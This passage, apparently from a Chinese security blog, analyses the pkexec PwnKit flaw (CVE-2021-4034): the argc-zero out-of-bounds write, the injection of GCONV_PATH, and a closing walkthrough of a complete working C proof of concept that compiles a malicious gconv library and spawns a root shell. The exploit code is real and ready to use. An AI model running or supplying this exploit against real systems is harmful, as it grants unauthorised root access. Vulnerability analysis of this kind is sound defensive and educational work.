<li>L639:将返回的路径赋值给 <code>path</code> 和 <code>argv[n]</code> </li>
</ul>
</li>
</ul>
<p>正常情况下,这样处理的逻辑没有问题。<br>但如果命令行参数 argc 为 0,则会出现意外情况:</p>
<ul>
<li>L534,n 永久设置为 1;</li>
<li>L610,<code>argv[1]</code> 发生越界读取,并把越界读取到的值赋给了 <code>path</code>;</li>
<li>L639,指针 s 被越界写入 <code>argv[1]</code>。</li>
</ul>
<p>问题在于,这个越界的 <code>argv[1]</code> 中读取和写入的是什么?</p>
<p>我们需要先了解参数的内存布局,结合内核代码来分析:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// linux5.4/fs/binfmt_elf.c:</span></span><br><span class="line"><span class="number">163</span> <span class="keyword">static</span> <span class="keyword">int</span></span><br><span class="line"><span class="number">164</span> create_elf_tables(struct linux_binprm *bprm, struct elfhdr *exec,</span><br><span class="line"><span class="number">165</span> <span class="keyword">unsigned</span> <span class="keyword">long</span> load_addr, <span class="keyword">unsigned</span> <span class="keyword">long</span> interp_load_addr)</span><br><span class="line"><span class="number">166</span> {</span><br><span class="line">...</span><br><span class="line"><span class="number">284</span> sp = STACK_ADD(p, ei_index);</span><br><span class="line">...</span><br><span class="line"> <span class="comment">// 布局 main 函数栈</span></span><br><span class="line"><span class="number">306</span> <span class="comment">/* Now, let's put argc (and argv, envp if appropriate) on the stack */</span></span><br><span class="line"> <span class="comment">// argc 入栈</span></span><br><span class="line"><span class="number">307</span> <span class="keyword">if</span> (__put_user(argc, sp++))</span><br><span class="line"><span class="number">308</span> <span class="keyword">return</span> -EFAULT;</span><br><span class="line"><span class="number">309</span></span><br><span class="line"> <span class="comment">// argv 入栈</span></span><br><span class="line"><span class="number">310</span> <span class="comment">/* Populate list of argv pointers back to argv strings. */</span></span><br><span class="line"><span class="number">311</span> p = current->mm->arg_end = current->mm->arg_start;</span><br><span class="line"><span class="number">312</span> <span class="keyword">while</span> (argc-- > <span class="number">0</span>) {</span><br><span class="line"><span class="number">313</span> <span class="keyword">size_t</span> len;</span><br><span class="line"><span class="number">314</span> <span class="keyword">if</span> (__put_user((<span class="keyword">elf_addr_t</span>)p, sp++))</span><br><span class="line"><span class="number">315</span> <span class="keyword">return</span> -EFAULT;</span><br><span class="line"><span class="number">316</span> len = strnlen_user((<span class="keyword">void</span> __user *)p, MAX_ARG_STRLEN);</span><br><span class="line"><span class="number">317</span> <span class="keyword">if</span> (!len || len > MAX_ARG_STRLEN)</span><br><span class="line"><span class="number">318</span> <span class="keyword">return</span> -EINVAL;</span><br><span class="line"><span class="number">319</span> p += len;</span><br><span class="line"><span class="number">320</span> }</span><br><span class="line"> <span class="comment">// argv null 入栈</span></span><br><span class="line"><span class="number">321</span> <span class="keyword">if</span> (__put_user(<span class="number">0</span>, sp++))</span><br><span class="line"><span class="number">322</span> <span class="keyword">return</span> -EFAULT;</span><br><span class="line"><span class="number">323</span> current->mm->arg_end = p;</span><br><span class="line"><span class="number">324</span></span><br><span class="line"> <span class="comment">// env 入栈</span></span><br><span class="line"><span class="number">325</span> <span class="comment">/* Populate list of envp pointers back to envp strings. */</span></span><br><span class="line"><span class="number">326</span> current->mm->env_end = current->mm->env_start = p;</span><br><span class="line"><span class="number">327</span> <span class="keyword">while</span> (envc-- > <span class="number">0</span>) {</span><br><span class="line"><span class="number">328</span> <span class="keyword">size_t</span> len;</span><br><span class="line"><span class="number">329</span> <span class="keyword">if</span> (__put_user((<span class="keyword">elf_addr_t</span>)p, sp++))</span><br><span class="line"><span class="number">330</span> <span class="keyword">return</span> -EFAULT;</span><br><span class="line"><span class="number">331</span> len = strnlen_user((<span class="keyword">void</span> __user *)p, MAX_ARG_STRLEN);</span><br><span class="line"><span class="number">332</span> <span class="keyword">if</span> (!len || len > MAX_ARG_STRLEN)</span><br><span class="line"><span class="number">333</span> <span class="keyword">return</span> -EINVAL;</span><br><span class="line"><span class="number">334</span> p += len;</span><br><span class="line"><span class="number">335</span> }</span><br><span class="line"> <span class="comment">// env null 入栈</span></span><br><span class="line"><span class="number">336</span> <span class="keyword">if</span> (__put_user(<span class="number">0</span>, sp++))</span><br><span class="line"><span class="number">337</span> <span class="keyword">return</span> -EFAULT;\</span><br><span class="line">...</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>从代码中可以看出,当 execve() 一个新程序时,内核将参数、环境字符串和指针(argv 和 envp)复制到新程序堆栈的末尾,main 函数参数是布局在栈上,argc、argv依次入栈(L307、L321),后面紧接着就是 env 入栈(L325-L336)。<br>把上面的代码简化成下面的图示:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">|---------+---------+-----+------------|---------+---------+-----+------------|</span><br><span class="line">| argv[0] | argv[1] | ... | argv[argc] | envp[0] | envp[1] | ... | envp[envc] |</span><br><span class="line">|----|----+----|----+-----+-----|------|----|----+----|----+-----+-----|------|</span><br><span class="line"> V V V V V V</span><br><span class="line"> "program" "-option" NULL "value" "PATH=name" NULL</span><br></pre></td></tr></table></figure>
<p>可以发现 argv 和 envp 指针在内存中是连续的,如果 argc 为 0,那么越界 argv[1] 实际上是 <code>envp[0]</code>,指向第一个环境变量 <code>value</code> 的指针。</p>
<p>argv[1] 是什么解决了,那再回过来看 pkexec 的 main() 函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">435</span> main (<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span><br><span class="line"><span class="number">436</span> {</span><br><span class="line">...</span><br><span class="line"><span class="number">534</span> <span class="keyword">for</span> (n = <span class="number">1</span>; n < (guint) argc; n++)</span><br><span class="line"><span class="number">535</span> {</span><br><span class="line">...</span><br><span class="line"><span class="number">568</span> }</span><br><span class="line">...</span><br><span class="line"><span class="number">610</span> path = g_strdup (argv[n]);</span><br><span class="line">...</span><br><span class="line"><span class="number">629</span> <span class="keyword">if</span> (path[<span class="number">0</span>] != <span class="string">'/'</span>)</span><br><span class="line"><span class="number">630</span> {</span><br><span class="line">...</span><br><span class="line"><span class="number">632</span> s = g_find_program_in_path (path);</span><br><span class="line">...</span><br><span class="line"><span class="number">639</span> argv[n] = path = s;</span><br><span class="line"><span class="number">640</span> }</span><br></pre></td></tr></table></figure>
<ul>
<li>L610,要执行的程序的路径从 argv[1](即 <code>envp[0]</code>)越界读取,并指向 <code>value</code></li>
<li>L632,这个路径 <code>value</code> 被传递给 <code>g_find_program_in_path()</code></li>
<li><code>g_find_program_in_path()</code> 会在 PATH 环境变量的目录中搜索一个名为 <code>value</code> 的可执行文件</li>
<li>如果找到这样的可执行文件,则将其完整路径返回给 pkexec 的 main() 函数(L632)</li>
<li>最后,L639,这个完整路径被越界写入 argv[1](即 <code>envp[0]</code>),覆盖了第一个环境变量。</li>
</ul>
<p>因此只要能控制 <code>g_find_program_in_path</code> 返回的字符串,就可以注入任意的环境变量。</p>
<p>Qualys <a href="https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034" target="_blank" rel="noopener">指出</a>如果 PATH 环境变量是 <code>PATH=name</code>,并且目录 <code>name</code> 存在(在当前工作目录中)并且包含一个名为 <code>value</code> 的可执行文件,则写入一个指向字符串 <code>name/value</code> 的指针越界到 <code>envp[0]</code>。</p>
<p>进一步,让这个组合的文件名里包含等号 “=”。传入 <code>PATH=name=.</code> ,创建一个 <code>name=.</code> 目录,并在其中放一个可执行文件 <code>value</code>,最终 <code>envp[0]</code> 就会被篡改为 <code>name=./value</code>,也就是注入了一个新的环境变量进去。</p>
<p>换句话说,这种越界写入可以绕过原有的安全检查,将不安全的环境变量(例如,LD_PRELOAD)重新引入 pkexec 的环境。</p>
<h3 id="寻找不安全的环境变量"><a href="#寻找不安全的环境变量" class="headerlink" title="寻找不安全的环境变量"></a>寻找不安全的环境变量</h3><p>新的问题是:要成功利用这个漏洞,应该将哪个不安全变量重新引入 pkexec 的环境中?我们的选择是有限的,因为在越界写入后不久(L639),pkexec 完全清除了它的环境(L702):</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">639</span> argv[n] = path = s;</span><br><span class="line">...</span><br><span class="line"><span class="number">657</span> <span class="keyword">for</span> (n = <span class="number">0</span>; environment_variables_to_save[n] != <span class="literal">NULL</span>; n++)</span><br><span class="line"><span class="number">658</span> {</span><br><span class="line"><span class="number">659</span> <span class="keyword">const</span> gchar *key = environment_variables_to_save[n];</span><br><span class="line">...</span><br><span class="line"><span class="number">662</span> value = g_getenv (key);</span><br><span class="line">...</span><br><span class="line"><span class="number">670</span> <span class="keyword">if</span> (!validate_environment_variable (key, value))</span><br><span class="line">...</span><br><span class="line"><span class="number">675</span> }</span><br><span class="line">...</span><br><span class="line"><span class="number">702</span> <span class="keyword">if</span> (clearenv () != <span class="number">0</span>)</span><br></pre></td></tr></table></figure>
<p>答案来自于 pkexec 的复杂性:为了向 stderr 打印错误消息,pkexec 调用 GLib 的函数 <code>g_printerr()</code>(注意:GLib 是 GNOME 库,而不是 GNU C 库,即 glibc);例如,函数 <code>validate_environment_variable()</code> 和 <code>log_message()</code> 调用 <code>g_printerr()</code> (L126,L408-L409):</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="number">88</span> log_message (gint level,</span><br><span class="line"> <span class="number">89</span> gboolean print_to_stderr,</span><br><span class="line"> <span class="number">90</span> <span class="keyword">const</span> gchar *format,</span><br><span class="line"> <span class="number">91</span> ...)</span><br><span class="line"> <span class="number">92</span> {</span><br><span class="line"> ...</span><br><span class="line"> <span class="number">125</span> <span class="keyword">if</span> (print_to_stderr)</span><br><span class="line"> <span class="number">126</span> g_printerr (<span class="string">"%s\n"</span>, s);</span><br><span class="line">------------------------------------------------------------------------</span><br><span class="line"> <span class="number">383</span> validate_environment_variable (<span class="keyword">const</span> gchar *key,</span><br><span class="line"> <span class="number">384</span> <span class="keyword">const</span> gchar *value)</span><br><span class="line"> <span class="number">385</span> {</span><br><span class="line"> ...</span><br><span class="line"> <span class="number">406</span> log_message (LOG_CRIT, TRUE,</span><br><span class="line"> <span class="number">407</span> <span class="string">"The value for the SHELL variable was not found the /etc/shells file"</span>);</span><br><span class="line"> <span class="number">408</span> g_printerr (<span class="string">"\n"</span></span><br><span class="line"> <span class="number">409</span> <span class="string">"This incident has been reported.\n"</span>);</span><br></pre></td></tr></table></figure>
<p><code>g_printerr()</code> 通常打印 UTF-8 错误消息,但如果环境变量 CHARSET 不是 UTF-8,它可以打印另一个字符集中的消息(注意:CHARSET 不是安全敏感的,它不是不安全的环境变量)。</p>
<p>要将消息从 UTF-8 转换为另一个字符集,<code>g_printerr()</code> 调用 glibc 的函数 <code>iconv_open()</code>。</p>
<p>要将消息从一个字符集转换为另一个字符集,<code>iconv_open()</code> 执行小型共享库;通常,这些三元组(“from”字符集、“to”字符集和库名称)是从默认配置文件 <code>/usr/lib/gconv/gconv-modules</code> 中读取的。但环境变量 <code>GCONV_PATH</code> 可以强制 <code>iconv_open()</code> 读取另一个配置文件;所以 <code>GCONV_PATH</code> 是不安全的环境变量之一(因为它会导致执行任意库),因此会被 ld.so 从 SUID 程序的环境中删除。</p>
<p>我们可以把 <code>GCONV_PATH</code> 重新引入 pkexec 的环境,并以 root 身份执行我们自己的共享库。</p>
<h3 id="回顾-POC"><a href="#回顾-POC" class="headerlink" title="回顾 POC"></a>回顾 POC</h3><p>现在我们对漏洞原理有了更深的认识,再看一看 POC</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"> <span class="number">1</span> <span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"> <span class="number">2</span> <span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"> <span class="number">3</span> <span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"> <span class="number">4</span> </span><br><span class="line"> <span class="number">5</span> <span class="keyword">char</span> *shell =</span><br><span class="line"> <span class="number">6</span> <span class="string">"#include <stdio.h>\n"</span></span><br><span class="line"> <span class="number">7</span> <span class="string">"#include <stdlib.h>\n"</span></span><br><span class="line"> <span class="number">8</span> <span class="string">"#include <unistd.h>\n\n"</span></span><br><span class="line"> <span class="number">9</span> <span class="string">"void gconv() {}\n"</span></span><br><span class="line"><span class="number">10</span> <span class="string">"void gconv_init() {\n"</span></span><br><span class="line"><span class="number">11</span> <span class="string">" setuid(0); setgid(0);\n"</span></span><br><span class="line"><span class="number">12</span> <span class="string">" seteuid(0); setegid(0);\n"</span></span><br><span class="line"><span class="number">13</span> <span class="string">" system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"</span></span><br><span class="line"><span class="number">14</span> <span class="string">" exit(0);\n"</span></span><br><span class="line"><span class="number">15</span> <span class="string">"}"</span>;</span><br><span class="line"><span class="number">16</span> </span><br><span class="line"><span class="number">17</span> <span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span> </span>{</span><br><span class="line"><span class="number">18</span> FILE *fp;</span><br><span class="line"><span class="number">19</span> system(<span class="string">"mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'"</span>);</span><br><span class="line"><span class="number">20</span> system(<span class="string">"mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules"</span>);</span><br><span class="line"><span class="number">21</span> fp = fopen(<span class="string">"pwnkit/pwnkit.c"</span>, <span class="string">"w"</span>);</span><br><span class="line"><span class="number">22</span> <span class="built_in">fprintf</span>(fp, <span class="string">"%s"</span>, shell);</span><br><span class="line"><span class="number">23</span> fclose(fp); </span><br><span class="line"><span class="number">24</span> system(<span class="string">"gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC"</span>);</span><br><span class="line"><span class="number">25</span> <span class="keyword">char</span> *env[] = { <span class="string">"pwnkit"</span>, <span class="string">"PATH=GCONV_PATH=."</span>, <span class="string">"CHARSET=PWNKIT"</span>, <span class="string">"SHELL=pwnkit"</span>, <span class="literal">NULL</span> };</span><br><span class="line"><span class="number">26</span> execve(<span class="string">"/usr/bin/pkexec"</span>, (<span class="keyword">char</span>*[]){<span class="literal">NULL</span>}, env);</span><br><span class="line"><span class="number">27</span> }</span><br></pre></td></tr></table></figure>
<p>需要新注意的是:</p>
<ol>
<li>L26,使用 <code>execve</code> 调用 <code>pkexec</code>,<code>(char*[]){NULL}</code>造成 <code>argv[1]</code> 越界读取</li>
<li>L25,一个特殊的数组,env[0]为 payload,env[1]引入了<code>GCONV_PATH</code></li>
<li>L20,设置非UTF-8环境,也就导致 payload 中 <code>gconv_init</code> 执行,造成 <code>/bin/sh</code> 执行,恢复环境变量得到 root shell。</li>
</ol>
<h2 id="0x03-漏洞总结"><a href="#0x03-漏洞总结" class="headerlink" title="0x03 漏洞总结"></a>0x03 漏洞总结</h2><p>总结一下该漏洞的利用思路:</p>
<ol>
<li>通过设置 <code>execve()</code> 的 argv[] 为零,造成 argv[1] 越界读取,并绕过安全检查</li>
<li>通过 <code>g_printerr</code> 函数发现可控的不安全环境变量 <code>GCONV_PATH</code></li>
<li>构造畸形的路径使 <code>pkexec</code> 从指定路径读取环境变量完成提权</li>
</ol>